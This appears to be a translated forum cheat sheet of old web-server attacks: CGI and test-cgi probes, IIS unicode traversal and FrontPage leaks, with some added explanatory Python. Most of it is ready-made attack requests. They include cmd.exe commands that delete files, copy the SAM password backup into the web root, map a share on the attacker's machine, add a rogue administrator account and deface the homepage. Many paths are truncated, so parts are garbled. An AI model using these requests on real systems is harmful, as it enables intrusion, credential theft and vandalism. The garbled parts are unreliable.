___________________________________________________________________________
☆☆
This vulnerability keeps generating temporary files on the server until its disk fills up, a remote denial of service that anyone can trigger.
It uses the default script in cgi-bin (Visitor Administrator).
Attack method:
Submit the following request: /cgi-bin/?user=guest
___________________________________________________________________________
☆☆
This vulnerability exposes the physical path of the scripts directory on the server. Requesting the page returns something like:
CGI Error
The specified CGI application misbehaved by not returning a complete set of
HTTP headers. The headers it did return are:
Can't open perl script "C:\InetPub\scripts\": No such file or
directory
From this we learn that the physical path behind the page is C:\InetPub\scripts\
Attack method:
Visit /cgi-bin/scripts/
___________________________________________________________________________
☆?PageServices☆
This lists the pages in a directory, and if you are lucky it also hands you usernames and passwords (all in plain text).
The method is url/?PageServices. The following variants are worth trying as well:
/?wp-cs-dump
/?wp-ver-info
/?wp-html-rend
/?wp-usr-prop
/?wp-ver-diff
/?wp-verify-link
/?wp-start-ver
/?wp-stop-ver
/?wp-uncheckout
___________________________________________________________________________
☆test-cgi☆
test-cgi is another common vulnerability. Enter:
/cgi-bin/test-cgi?whatever
Will return:
CGI/1.0 test script report:
argc is 0. argv is .
SERVER_SOFTWARE = NCSA/1.4B
SERVER_NAME =
GATEWAY_INTERFACE = CGI/1.1
SERVER_PROTOCOL = HTTP/1.0
SERVER_PORT = 80
REQUEST_METHOD = GET
HTTP_ACCEPT = text/plain, application/x-html, application/html,
text/html, text/x-html
PATH_INFO =
PATH_TRANSLATED =
SCRIPT_NAME = /cgi-bin/test-cgi
QUERY_STRING = whatever
REMOTE_HOST =
REMOTE_ADDR = 200.200.200.200
REMOTE_USER =
AUTH_TYPE =
CONTENT_TYPE =
CONTENT_LENGTH =
Now do it again, entering this:
/
Have you seen PASSWD?
Or attack through port 80 with netcat (the bare GET line is an HTTP/0.9 request, which is why the report shows SERVER_PROTOCOL = HTTP/0.9):
machine% echo "GET /cgi-bin/test-cgi?/*" | nc <target> 80
return:
CGI/1.0 test script report:
argc is 1. argv is /\*.
SERVER_SOFTWARE = NCSA/1.4.1
SERVER_NAME =
GATEWAY_INTERFACE = CGI/1.1
SERVER_PROTOCOL = HTTP/0.9
SERVER_PORT = 80
REQUEST_METHOD = GET
HTTP_ACCEPT =
PATH_INFO =
PATH_TRANSLATED =
SCRIPT_NAME = /bin/cgi-bin/test-cgi
QUERY_STRING = /a /bin /boot /bsd /cdrom /dev /etc /home /lib /mnt
/root /sbin /stand /sys /tmp /usr /usr2 /var
REMOTE_HOST =
REMOTE_ADDR = 255.255.255.255
REMOTE_USER =
AUTH_TYPE =
CONTENT_TYPE =
CONTENT_LENGTH =
The contents of the server's root directory are listed! Now try this:
machine% echo "GET /cgi-bin/test-cgi?*" | nc <target> 80
return:
CGI/1.0 test script report:
argc is 1. argv is \*.
SERVER_SOFTWARE = NCSA/1.4.1
SERVER_NAME =
GATEWAY_INTERFACE = CGI/1.1
SERVER_PROTOCOL = HTTP/0.9
SERVER_PORT = 80
REQUEST_METHOD = GET
HTTP_ACCEPT =
PATH_INFO =
PATH_TRANSLATED =
SCRIPT_NAME = /bin/cgi-bin/test-cgi
QUERY_STRING = calendar cgi-archie cgi-calendar cgi-date cgi-finger
cgi-fortune imagemap
mail-query mail-query-2 majordomo
menu post-query
query src test-cgi uptime
REMOTE_HOST =
REMOTE_ADDR = 255.255.255.255
REMOTE_USER =
AUTH_TYPE =
CONTENT_TYPE =
CONTENT_LENGTH =
This lists the contents of the cgi-bin directory, i.e. every script the server offers for probing. The cause is that test-cgi is a /bin/sh script that echoes $QUERY_STRING unquoted, so the shell word-splits the query and expands any glob characters in it against the filesystem before echo runs; quoting the variable, or putting set -f at the top of the script, stops it.
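To make the mechanism concrete, here is an added Python emulation (not code from the original post or from NCSA) of what the unquoted echo in test-cgi does to the query string. It builds a small constructed directory tree in a temp directory so it runs offline; cwd stands in for the cgi-bin directory the script runs from and root for the filesystem root, so "?*" lists cgi-bin and "?/*" lists the root, exactly as in the two netcat runs above. expand_quoted() shows the fixed script's behaviour.

```python
"""Emulate why NCSA test-cgi leaks directory listings.

The vulnerable report line in test-cgi is a shell statement of the form
    echo QUERY_STRING = $QUERY_STRING
Because $QUERY_STRING is unquoted, /bin/sh word-splits it and expands glob
characters against the filesystem before echo runs. This emulation
reproduces that expansion against a constructed directory tree.
Added example; the tree and file names are made up.
"""
import glob
import os
import tempfile


def expand_unquoted(query: str, cwd: str, root: str) -> list:
    """Emulate `echo $QUERY_STRING`: split on whitespace, then glob each word.

    Absolute patterns ("/*") are resolved inside `root`, relative ones
    inside `cwd`, so nothing touches the real machine's root directory.
    """
    words = []
    for word in query.split():
        absolute = word.startswith("/")
        base = root if absolute else cwd
        pattern = word[1:] if absolute else word
        hits = glob.glob(os.path.join(base, pattern))
        matches = sorted(os.path.relpath(h, base) for h in hits)
        if absolute:
            matches = ["/" + m for m in matches]
        # sh leaves a glob that matches nothing untouched
        words.extend(matches or [word])
    return words


def expand_quoted(query: str) -> list:
    """Emulate `echo "$QUERY_STRING"`: the string is passed through untouched."""
    return [query]


def build_sample_tree() -> tuple:
    """Construct a tiny filesystem image (constructed sample, not a real server).

    Returns (root, cgi_bin) paths.
    """
    root = tempfile.mkdtemp(prefix="testcgi-")
    for top in ("bin", "etc", "home", "tmp", "usr"):
        os.makedirs(os.path.join(root, top))
    cgi_bin = os.path.join(root, "usr", "cgi-bin")
    os.makedirs(cgi_bin)
    for script in ("calendar", "post-query", "test-cgi", "uptime"):
        open(os.path.join(cgi_bin, script), "w").close()
    return root, cgi_bin


def report(query: str, cwd: str, root: str) -> str:
    """Render the QUERY_STRING line the way the vulnerable script prints it."""
    return "QUERY_STRING = " + " ".join(expand_unquoted(query, cwd, root))


if __name__ == "__main__":
    root, cgi_bin = build_sample_tree()
    print(report("*", cgi_bin, root))    # names of the cgi-bin scripts
    print(report("/*", cgi_bin, root))   # top-level directories of the root
    print("QUERY_STRING = " + " ".join(expand_quoted("/*")))  # fixed script
```

The fixed script prints the literal `/*`; the vulnerable one prints the listing, and nothing in the HTTP layer is involved at all, which is why the same request works regardless of web-server version.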
___________________________________________________________________________
☆unicode☆
Directory listing:
http://ip/msadc/..Á../..Á../..Á../winnt/system32/?/c+dir+c:\
/scripts/..Á../winnt/system32/?/c+dir+c:\
Create a folder:
/scripts/..Á../winnt/system32/?/c+md+c:\snowspider
Delete an empty folder:
/scripts/..Á../winnt/system32/?/c+rd+c:\snowspider
Delete a file:
/scripts/..Á../winnt/system32/?/c+del+c:\
Copy a file (here the SAM backup from the repair directory into the web root, where it can be downloaded):
/scripts/..Á../winnt/system32/?/c+copy+c:\winnt\repair\sam._+c:\inetpub\wwwroot\
NET USE (map a share on your own machine):
/scripts/..Á../winnt/system32/?/c+use+i:+\\myip\temp
Changing how cmd is called: first copy it into the scripts directory,
/scripts/..Á../winnt/system32/?/c+copy+c:\winnt\system32\+c:\inetpub\scripts\
then call the copy directly, without the traversal:
/scripts/?/c+echo+Hacked+by+chinese+>+f:\wwwroot\xxx\
Display the target host's current environment variables:
/scripts/..Á../winnt/system32/?/c+set
Using the FIND command
For example, to view the contents of all .asp and .asa files under the web directory d:\inetpub\wwwroot:
/scripts/..Á..\winnt/system32/?/n+/v+""+d:\inetpub\wwwroot\*.as*
The same trick displays every file of a given type under any path (find /n /v "" prints every line of each matching file, with line numbers):
/scripts/..Á..\winnt/system32/?/n+/v+""+c:\inetpub\wwwroot\*.ht*
Add a user
Create a new user named hacker with the password "password":
/script/?/c c:\winnt\system32\ user hacker password /add
Modify the homepage:
/scripts/..Á../winnt/system32/cmd".exe?/c+echo+Hacked+by+hacker+>+f:\wwwroot\xxx\
/scripts/..Á../winnt/system32/cmd".exe?/c+echo+12/1/2k+>>+f:\wwwroot\xxx\
(Windows ignores the stray quote in cmd".exe, which lets the request slip past naive signature matching on "cmd.exe".) After this the homepage reads:
Hacked by hacker
12/1/2k
More unicode vulnerabilities can be found in this forum.
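The requests above all rely on the same trick: IIS checked the URL for ".." before it decoded overlong UTF-8 sequences, so a "/" or "\" smuggled in as a two-byte overlong form (%c0%af and %c1%9c are the classic ones; the garbled URLs in this post do not preserve the exact bytes) survived the check and then resolved as a separator. The following Python checker is an added example, not code from the post: it decodes a request path the permissive way the vulnerable server did, records any overlong sequence, resolves the path, and reports whether it climbs out of the web root and lands on cmd.exe. The sample request-targets in the test are constructed.

```python
"""Detect the IIS "Unicode" traversal pattern in request paths.

Added example. permissive_utf8_decode() accepts 2-byte overlong encodings
(a strict decoder rejects them), which is the behaviour that let
"..%c0%af.." pass the ".." check and still resolve to "../..".
"""
from urllib.parse import unquote_to_bytes


def permissive_utf8_decode(raw: bytes) -> tuple:
    """Decode bytes as UTF-8 but accept 2-byte overlong forms.

    Returns (text, overlong_seen). 0xC0 0xAF maps to '/' and 0xC1 0x9C
    to '\\', both flagged as overlong because their value fits in one byte.
    """
    out = []
    overlong = False
    i = 0
    while i < len(raw):
        b = raw[i]
        if b < 0x80:
            out.append(chr(b))
            i += 1
        elif 0xC0 <= b < 0xE0 and i + 1 < len(raw) and 0x80 <= raw[i + 1] < 0xC0:
            cp = ((b & 0x1F) << 6) | (raw[i + 1] & 0x3F)
            if cp < 0x80:          # value fits in one byte: overlong encoding
                overlong = True
            out.append(chr(cp))
            i += 2
        else:
            # any other byte: keep it so the scan never fails closed
            out.append(chr(b))
            i += 1
    return "".join(out), overlong


def analyze_request(target: str) -> dict:
    """Classify one request-target (URL path plus optional query string)."""
    path, _, query = target.partition("?")
    decoded, overlong = permissive_utf8_decode(unquote_to_bytes(path))
    # IIS treats backslash as a separator as well as slash
    segments = decoded.replace("\\", "/").split("/")
    stack = []
    escaped = False
    for seg in segments:
        # Windows ignores '"' in a file name, which is why cmd".exe works
        seg = seg.replace('"', "")
        if seg in ("", "."):
            continue
        if seg == "..":
            if stack:
                stack.pop()
            else:
                escaped = True     # climbed above the web root
        else:
            stack.append(seg)
    return {
        "decoded_path": "/" + "/".join(stack),
        "overlong_utf8": overlong,
        "escapes_root": escaped,
        "runs_shell": stack[-1:] == ["cmd.exe"] and query.startswith("/c"),
    }


if __name__ == "__main__":
    for t in ("/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\\",
              "/scripts/..%c1%9c../winnt/system32/cmd%22.exe?/c+set",
              "/scripts/hello.asp"):
        print(t, analyze_request(t))
```

Run over a web-server log, a hit on overlong_utf8 together with escapes_root is the signature of this attack; a plain "/scripts/../default.htm" is neither overlong nor an escape and is left alone.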
___________________________________________________________________________
☆_vti_inf.html☆
Description: There is a _vti_inf.html file in the root directory of the web site. It is created by the FrontPage Server Extensions and contains a series of important details about the installed extensions; the FrontPage Server Extensions are a web service with many vulnerabilities, and through them an intruder may be able to modify the homepage file directly. Reading /_vti_inf.html tells you the FP extensions version and the paths of their components on the server. There are also password files under /_vti_pvt/, such as:
/_vti_pvt/
/_vti_pvt/
/_vti_pvt/
/_vti_pvt/
How do I use it specifically? I enter /_vti_inf.html and then look at the
source file; how do I use what I find?
Answer: You can take a look at: /
Take a look at: /xcb/Server/logs/access_log
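As an added example (not from the post or its answer), here is a Python parser for the two artefacts this section is about: the FrontPage configuration comment inside _vti_inf.html, and an htpasswd-style password file from _vti_pvt. The sample contents are constructed; the file name service.pwd is assumed, since the post's own list of _vti_pvt files did not survive. The FPAuthorScriptUrl value it extracts is the authoring endpoint the extensions use to write pages, which is what the post means by modifying the homepage through them.

```python
"""Pull what /_vti_inf.html and a _vti_pvt password file reveal.

Added example. The FrontPage Server Extensions write an HTML comment into
_vti_inf.html carrying FPVersion and the FP*ScriptUrl paths of the RPC
DLLs; the _vti_pvt password files are "user:crypt-hash" lines under a
"# -FrontPage-" header. Both samples below are constructed.
"""
import re

# Constructed sample of /_vti_inf.html
SAMPLE_VTI_INF = """<html><head><title>FrontPage</title></head><body>
<!-- FrontPage Configuration Information
 FPVersion="3.0.2.1706"
 FPShtmlScriptUrl="_vti_bin/shtml.dll/_vti_rpc"
 FPAuthorScriptUrl="_vti_bin/_vti_aut/author.dll"
 FPAdminScriptUrl="_vti_bin/_vti_adm/admin.dll"
-->
</body></html>"""

# Constructed sample of /_vti_pvt/service.pwd (hashes are made up)
SAMPLE_SERVICE_PWD = """# -FrontPage-
webmaster:Xm3qR2Kz1v9bA
author:Gh5yTp0LqW3eM
"""


def parse_vti_inf(html: str) -> dict:
    """Return the FP* key/value pairs from the configuration comment."""
    m = re.search(r"<!--\s*FrontPage Configuration Information(.*?)-->", html, re.S)
    if not m:
        return {}
    return dict(re.findall(r'(FP\w+)="([^"]*)"', m.group(1)))


def fp_endpoints(info: dict) -> list:
    """List the RPC endpoints the extensions expose, relative to the web root."""
    keys = ("FPShtmlScriptUrl", "FPAuthorScriptUrl", "FPAdminScriptUrl")
    return ["/" + info[k] for k in keys if k in info]


def parse_pwd_file(text: str) -> list:
    """Return (user, hash) pairs; comments and malformed lines are skipped.

    The hashes are crypt(3) output, an offline cracking target rather than
    a plain-text password.
    """
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or ":" not in line:
            continue
        user, digest = line.split(":", 1)
        entries.append((user, digest))
    return entries


if __name__ == "__main__":
    info = parse_vti_inf(SAMPLE_VTI_INF)
    print("FPVersion:", info.get("FPVersion"))
    for url in fp_endpoints(info):
        print("endpoint:", url)
    for user, digest in parse_pwd_file(SAMPLE_SERVICE_PWD):
        print("account:", user, digest)
```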